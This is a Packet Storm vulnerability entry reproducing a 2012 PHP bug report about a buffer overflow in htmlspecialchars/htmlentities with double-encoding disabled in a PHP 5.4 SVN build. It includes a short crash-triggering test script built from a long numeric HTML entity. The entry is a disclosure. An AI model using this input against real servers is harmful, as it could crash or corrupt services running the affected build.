PHP 5.4 Buffer Overflow

2012-02-03T00:00:00
ID PACKETSTORM:109406
Type packetstorm
Reporter cataphract
Modified 2012-02-03T00:00:00

Description

                                        
                                            `From: cataphract  
Operating system: Any  
PHP version: 5.4SVN-2012-02-03 (SVN)  
Package: Reproducible crash  
Bug Type: Bug  
Bug description:Buffer overflow on htmlspecialchars/entities with $double=false  
Description:  
------------  
Long entities can cause a buffer overflow because the loop only guarantees  
40 bytes available in beginning.  
Test script:  
---------------  
<?php  
echo  
htmlspecialchars('"""""""""""""""""""""""""""""""""""""""""""""&#x000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000005;',  
ENT_QUOTES, 'UTF-8', false), "\n";  
  
  
`